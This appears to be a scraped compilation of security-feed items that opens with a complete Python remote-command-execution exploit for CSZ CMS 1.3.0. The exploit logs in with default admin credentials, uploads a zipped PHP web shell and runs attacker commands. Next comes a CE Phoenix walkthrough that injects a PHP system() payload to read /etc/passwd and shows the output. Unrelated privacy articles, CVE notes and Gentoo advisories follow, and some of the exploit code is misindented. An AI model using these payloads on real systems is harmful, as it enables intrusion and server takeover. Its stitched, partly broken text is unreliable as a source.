CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

CSZ CMS 1.3.0 Remote Command Execution

CE Phoenix version 1.0.8.20 suffers from an authenticated remote command execution vulnerability.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)### POC:<img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000">1. **Login to admin panel:**     - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english`    2. **Access english.php:**    - Click on `english.php` and inject the payload:     ```    <?php echo system('cat /etc/passwd'); ?>    ```    3. **Save Changes:**    - Save the modified file.4. **View Results:**    - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/`    - You will see the following result:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinsystemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologinsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpolkitd:x:998:997:User for polkitd:/:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinchrony:x:997:995::/var/lib/chrony:/sbin/nologinsoft:x:1000:1000::/home/soft:/sbin/nologinsaslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinemps:x:995:1001::/home/emps:/bin/bashnamed:x:25:25:Named:/var/named:/sbin/nologinexim:x:93:93::/var/spool/exim:/sbin/nologinvmail:x:5000:5000::/var/local/vmail:/bin/bashmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/falsewebuzo:x:993:993::/home/webuzo:/bin/bashapache:x:992:991::/home/apache:/sbin/nologinapache:x:992:991::/home/apache:/sbin/nologin

CE Phoenix 1.0.8.20 Remote Command Execution

By Deeba Ahmed
Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined.
This is a post from HackRead.com Read the original post: Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

As per Atlas VPN’s research, besides Amazon, eBay, and Afterpay, other popular apps were also found to be sharing personal details and financial data with third parties.

To shop for Black Friday and Cyber Monday, most users turn to smartphones and tablets to secure the best deals. However, it is essential to be aware of potential risks, such as how various vendors collect your data, to navigate the shopping season safely.

According to the latest research conducted by the Atlas VPN team, numerous leading online shopping platforms collect sensitive user data, with some going as far as sharing this **information with third parties** without the users’ knowledge.

The platforms underwent assessment across various data collection categories, encompassing personal details, financial information, and user geolocation. The evaluated data points included the user’s name, phone number, payment method, and precise location, which were further categorized into extended data types for more in-depth analysis.

In addition, Atlas VPN researchers assessed the Google Play app profiles of the 60 most popular Android apps within the shopping category. The apps were ranked according to the number of user information data points collected.

The researchers chose apps from App Figures’ top Android shopping app charts for 2023 for their analysis. The charts comprised various apps, including shopping, buy now and pay later, and discount offer apps. Researchers have shared their list of the year’s top 15 highest-user data-collecting apps.

According to their **report**, Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined. Reportedly, eBay collects 28 user data points, and Amazon collects 25.

The popular buy-now app Afterpay was the third-highest data collecting platform with 22 data points against 7 data types. It was the only identified app that didn’t just collect data but also shared sensitive data such as in-app messages, emails, SMS messages, and credit scores with third parties.

Next were Home Improvement retailer Lowe’s health retail platform iHerb and Vinted, a secondhand products marketplace. Each collected 21 data points. Chinese e-comm website Alibaba and home goods giant Home Depot collected 20 data points across 9 data types. Poshmark, another secondhand goods retailer, collected significant user data with 19 data points in 7 categories.

The rest of the apps included Nike, Wayfair, OfferUp, Craigslist, ASOS, and H&M apps, each collecting 18 data points. Among the 60 apps examined by Atlas VPN, Kohl’s app didn’t collect any data. A staggering 75% of the apps share user data with third parties. For instance, 52% and 38% of apps shared app activity, app info, and performance data, typically used to enhance user experience. 

Moreover, 58% of the apps shared personal data like names, home addresses, email IDs, and phone numbers with third parties. A whopping 25% of these apps shared device IDs or other unique identifiers for smartphones and tablets.

Around one-third, or 37%, of the apps disclosed financial data, including purchase history and payment details, whereas 28% shared location data with external sources. The extent of data sharing among Android shopping apps is alarming and a threat to user privacy.

Cybersecurity writer at Atlas VPN, Vilius Kardelis, shared his thoughts on shopping app data collection with Hackread.com, stating that:

“In today’s digital age, your personal information is being extensively collected by apps and shared with countless firms. This holiday season, approach all apps aware your data is being collected. Take the time to carefully read privacy policies, be mindful of the permissions you grant, and prioritize safe shopping practices to safeguard your personal information.”

****Surprised? Don’t be!****

Smartphone apps are designed to collect user data, and the extent and duration of this collection are subjects of debate. Contrarily, data collection and sharing constitute a lucrative business for technology giants.

**In 2021,** researchers claimed that Android sends more data to Google than iOS does to Apple. The research suggested that Android devices collect and transmit twice as much data to Google compared to iOS to Apple. However, Google refuted these findings.

In August of last year, researchers compiled a list of the 10 Android Educational Apps that collect the most user data. The list, **available here**, includes some of the most prominent and widely used Android apps globally.

****Conclusion:****

There isn’t much one can do to prevent apps from collecting data. However, if you are an Android user, consider downloading apps only after reviewing the section on the Play Store that details the data the app collects.

1.  **Fake GitHub Repos Delivering Malware as PoCs**
2.  **Google kicks out 600 malicious apps from Play Store**
3.  **Apple removed all major VPN apps from Chinese App Store**
4.  **Google removes ClearURLs Chrome extension from its store**
5.  **Google Fails To Remove “App Developer” Behind Malware Scam**

Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

Sensitive data exposure in Webconf in Tribe29 Checkmk Appliance before 1.6.8 allows local attacker to retrieve passwords via reading log files.

When restoring a backup the passphrase is submitted. The form used the GET method so the passphrase was logged to the apache access log.

We found this vulnerability internally.

**Indicators of Compromise**: Check /var/log/apache2/access.log for occurences of passphrase

**Vulnerability Management**: We have rated the issue with a CVSS Score of 3.3 (Low) with the following CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N. We assigned CVE-2023-6287 to this vulnerability.

**Changes**: With this Werk the method is changed to POST so it will no longer be logged.

To the list of all Werks

CVE-2023-6287: Use POST for starting backup restore job

Mattermost fails to use innerText / textContent when setting the channel name in the webapp during autocomplete, allowing an attacker to inject HTML to a victim's page by create a channel name that is valid HTML. No XSS is possible though.

**Mattermost Injection vulnerability**

Low severity GitHub Reviewed Published Nov 27, 2023 to the GitHub Advisory Database • Updated Nov 28, 2023

GHSA-jcgv-3pfq-j4hr: Mattermost Injection vulnerability

A vulnerability, which was classified as critical, was found in moses-smt mosesdecoder up to 4.0. This affects an unknown part of the file contrib/iSenWeb/trans_result.php. The manipulation of the argument input1 leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246135.

CVE-2023-6309

What you look for online is up to you—just make sure no one else is taking a peek.

When it comes to looking something up on the web, most of us default to “googling” it—Google's search engine has become so dominant that it's now a verb, in the same way that Photoshop is. But using Google for your searches comes with a privacy trade-off.

Google's business is, of course, based on advertising, and every search you make feeds into the profile of you that it uses to target the ads you see around the web. While Google isn't telling marketing firms what searches you're running, it is using those queries to build up a picture of you that ads can be sold against. As such, Google can be a real snoop about collecting all your data and using it to personalize your ads and the search results you get.

There are ways to increase your privacy on Google’s platforms, like using privacy-focused browsers, using privacy-focused alternatives to Google Maps, auto-deleting your web history after a certain time period, or simply limiting the amount of data the company collects in the first place, by opting out of features like web-based email and location awareness. (And you should know that using your browser's incognito mode isn’t as sneaky as you think it is.) If you're serious about getting off the data collection grid, there’s a bevy of other privacy-focused search options at your disposal. So if you want to use a search engine that doesn't keep track of your queries, serve your data to advertisers, or change your search results based on what it thinks you’ll like, you’ve got some options.

DuckDuckGo

DuckDuckGo is simple, secure, and private.

DuckDuckGo via David Nield

The granddaddy of Google alternatives, DuckDuckGo has made private search its raison d'être for more than 15 years. The service is a little harder to recommend these days, after a kerfuffle in 2022 where the company was caught in an apparent partnership with Microsoft that allowed the tech behemoth’s tracking scripts to run unimpeded on the DuckDuckGo browser. After outcry from privacy advocates, DuckDuckGo walked back that stance a few months later, and it now says it does indeed block Microsoft’s trackers.

If you can move past that particular ugly duckling, the service is still far more private than Google. DuckDuckGo says it collates information in search results from over 400 sources. It doesn’t draw from Google, but it does pull from places like Bing and Wikipedia. What it doesn’t do is personalize search results based on data it collects from users. Like Google, DuckDuckGo displays ads, but they’re not tailored to what it thinks you’ll like based on your search history.

DuckDuckGo can be installed into just about any browser via a browser extension. It also has a full browser available on desktop for Mac and Windows. There are also mobile apps on both iOS and Android that work as browsers while incorporating DuckDuckGo’s search engine.

On the browser and app alike, the service automatically tracks and blocks all the data-scraping efforts from the websites you visit. Press the shield button in the browser bar to see what sites have tried to collect your data or track your travels across the web. Another feature blocks trackers and data requests in other apps on your phone. DuckDuckGo says it can’t block certain scripts and trackers on the websites that run them (like Facebook, for example), but tapping that little button quickly lets you know what’s being blocked and what’s not.

Brave Search

Brave isn't going to keep track of what you're looking for.

Brave via David Nield

The privacy-focused browser extension provider Brave has its own dedicated search engine. The company launched the service in 2021. Like the other services on this list, Brave says its Search product doesn’t track your searches or log your data. It's impressively comprehensive—as much for its security and privacy as for the results you get.

Simply put, no logs of your queries are kept by the search engine. While that might make for a slightly less convenient user experience—Google might automatically know you're more interested in the Miami Dolphins than actual dolphins, for instance—it does mean that you can search without worrying that you're going to see any related advertising.

"It's impossible for us to share, sell, or lose your data, because we don’t collect it in the first place," says Brave. While the service might eventually become ad-supported, those adverts won't know anything about you or what you've been looking for on the web, making it distinctly different from Google's offering.

Brave also has a service in beta called Goggles that lets users customize their own page rankings to make search results more relevant to each person. It can have some issues, such as being a bit complicated and also could lead to people creating their own little filter bubbles—inadvertently or otherwise.

You can download the Brave Browser for desktop, or get its mobile apps on Android and iOS. You can also access the Brave search engine from any web browser and any device. You don't have to use the Brave browser to use it.

Kagi

The prospect of paying for a search engine might seem odd if you’re used to unlimited Googling on a whim. But that’s exactly the service Kagi is offering.

If you’re willing to pay for yet another subscription, Kagi is a premium search experience worth trying. You can customize how search results are displayed and how links are organized and accessed. There’s also a robust array of search operators and keyboard shortcuts to use. Kagi’s privacy policy is similar to the other services on this list, in that it doesn’t track your online movements or collect your data. It also doesn’t show ads, which feels like such a relief in the era of endless pop ups and sponsored posts.

The pricing plan is simple. There is a free tier, which allots you 100 searches per month before cutting you off. From there you can pay $5 per month for 500 searches, or get unlimited searches $10 a month. All plans, even the free ones, require you to make an account.

Kagi is available as a browser extension for Firefox, Google Chrome, and Safari. Kagi’s Orion browser is available on the Mac, and it also has an iOS app.

Startpage

Want Google’s search results but without Google? Startpage may be the answer. The company serves up Google’s search results without you being tracked. “Startpage submits your query to Google anonymously, then returns Google results to you privately,” the company says on its website. It adds that Google “never sees you and does not know who made the request”.

Startpage, which was founded in the Netherlands in 2006, says that it doesn’t store people’s personal data or search history, and your IP address is removed by its servers. The company also says it blocks price trackers and prevents advertisers from showing you ads based on your online history. (It does show ads from Google’s search results). Its search results also let you click to open an anonymous view of them, which it claims works like a VPN.

The experience isn’t exactly the same as Google search, but the results are. For instance, if you search for something in the news—maybe Elon Musk, if you must—Google will show you a carousel of the latest news stories before its search results. Google also includes Musk’s latest tweets, videos of him, and photos. When you’re using Startpage, the clutter is removed and you just get URLs.

Mojeek

Mojeek doesn’t use search results from other search engines. Instead, the British search engine, which launched in 2006, is building its own index of the web. It’s doing this in the same way as Google and Bing. The company’s crawlers, which trawl the web and collect information about pages, have indexed more than six billion web pages.

This crawling isn’t as extensive as Google’s—back in 2013 Google said it was indexing 30 trillion web pages, 100 billion times a month—but Mojeek says its approach means it is fully in control of the search results it shows. The company argues there should be alternative indexes to those controlled by Big Tech. “Making and altering our own algorithm from scratch to display high quality and unbiased results is essential,” the company said in 2018.

But that’s not the only difference to Google. Mojeek also says it doesn’t track people. The search results you see are based entirely on the words that you type in, the company says, and it doesn’t collect IP addresses, search history or the clicks that you make.

Limiting Google

You can break the connection between Google Chrome and your Google account.

Google via David Nield

It's worth bearing in mind that if you're using Google Chrome and you're signed into Google, you may well be syncing your DuckDuckGo or Brave searches back to your Google account. Your Google web history and your Chrome browsing history (if you're signed into Google) will match up most of the time, because Google keeps them in sync by default, partly to make it easier to use Google across multiple devices.

To stop this from happening in Chrome, click the three dots in the top right-hand corner, then choose **Settings**. If you see that you're signed into your Google account at the very top, click **Turn off**—this will break the connection between Google and your browser, and you'll be given the option to delete all the data that's stored locally on your device (including your browsing history, bookmarks, and stored passwords).

Perhaps an easier option is to simply switch to another browser altogether—as we've already mentioned, Brave, DuckDuckGo, and Kagi all have them. Other good cross-platform alternatives to Chrome are Microsoft Edge, Mozilla Firefox, Opera and Safari from Apple—but whichever one you switch to, be sure to check out the settings for deleting your browsing history as you go. (All of these browsers have simple-to-use options for this.)

Whichever browser you decide to use, opening up a private or incognito window while you're searching will prevent those searches from being logged inside the browser—as soon as you close the window, the search is gone forever. Bear in mind that these modes don't necessarily stop online companies from tracking your queries though. (If you sign into your Google account while in private mode, Google will still be able to track you.)

If you can't bring yourself to be parted from the search results that Google serves up, you can at least make sure that they're not remembered for too long. Open up your Google account settings page on the web, then click **Data & Privacy** and scroll down to **Web & App Activity.** You can choose either **Manage activity** to remove history and searches manually, or select the **Auto-delete** option to have this data wiped automatically once it's been stored for a certain amount of time.

Private and Secure Web Search Engines: DuckDuckGo, Brave, Kagi, Startpage

The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access.

Title: TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution  
Advisory ID: ZSL-2023-5801  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (5/5)  
Release Date: 25.11.2023

**Summary**

The Atemio AM 520 HD Full HD satellite receiver enables the reception of digital satellite programs in overwhelming image quality in both SD and HD ranges. In addition to numerous connections, the small all-rounder offers a variety of plugins that can be easily installed thanks to the large flash memory. The TitanNit Linux software used combines the advantages of the existing E2 and Neutrino systems and is therefore fast, stable and adaptable.

**Description**

The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access.

**Vendor**

AAF Digital HD Forum | Atelmo GmbH - http://www.aaf-digital.info | https://www.atemio.de

**Affected Version**

Firmware <=2.01

**Tested On**

GNU/Linux 2.6.32.71 (STMicroelectronics)  
GNU/Linux 3.14-1.17 (armv7l)  
GNU/Linux 3.14.2 (mips)  
ATEMIO M46506 revision 990  
Atemio 7600 HD STB  
CPU STx7105 Mboard  
titan web server

**Vendor Status**

N/A

**PoC**

titannit\_rce.py

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[25.11.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution

Gentoo Linux Security Advisory 202311-14 - Multiple vulnerabilities have been discovered in GRUB, which may lead to secure boot circumvention or code execution. Versions greater than or equal to 2.06-r9 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GRUB: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #881413, #915187  
       ID: 202311-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discoverd in GRUB, which may lead to  
secure boot circumvention or code execution.

Background  
=========  
GNU GRUB is a multiboot boot loader used by most Linux systems.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-boot/grub  < 2.06-r9     >= 2.06-r9

Description  
==========  
Multiple vulnerabilities have been discovered in GRUB. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GRUB users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-boot/grub-2.06-r9"

References  
=========  
[ 1 ] CVE-2022-2601  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2601  
[ 2 ] CVE-2022-3775  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3775  
[ 3 ] CVE-2023-4692  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4692  
[ 4 ] CVE-2023-4693  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4693

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-14

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-14

Gentoo Linux Security Advisory 202311-13 - A privilege escalation vulnerability has been discovered in Apptainer. Versions greater than or equal to 1.1.8 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Apptainer: Privilege Escalation  
     Date: November 25, 2023  
     Bugs: #905091  
       ID: 202311-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A privilege escalation vulnerability has been discoverd in Apptainer.

Background  
=========  
Apptainer is the container system for secure high-performance computing.

Affected packages  
================  
Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-containers/apptainer  < 1.1.8       >= 1.1.8

Description  
==========  
A vulnerability has been discovered in Apptainer. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
There is an ext4 use-after-free flaw that is exploitable in vulnerable  
versions.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Apptainer users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/apptainer-1.1.8"

References  
=========  
[ 1 ] CVE-2023-30549  
      https://nvd.nist.gov/vuln/detail/CVE-2023-30549

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-13

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web